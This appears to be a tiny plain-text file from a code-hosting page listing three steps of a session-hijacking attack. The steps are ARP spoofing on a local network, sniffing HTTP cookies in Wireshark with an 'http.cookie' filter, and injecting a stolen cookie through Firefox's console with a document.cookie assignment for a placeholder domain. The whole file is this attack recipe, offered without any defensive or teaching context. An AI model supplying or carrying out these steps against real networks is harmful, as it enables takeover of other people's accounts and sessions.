17 lines
182 B
Plaintext
17 lines
182 B
Plaintext
|
|
|
|
run arpspoofing
|
|
|
|
run wireshark and filter "http.cookie"
|
|
|
|
|
|
|
|
|
|
run in console firefox for inject cookie:
|
|
|
|
document.cookie = "sniffing cookie; domain=.domain.com; path=/; Secure";
|
|
|
|
|
|
|
|
|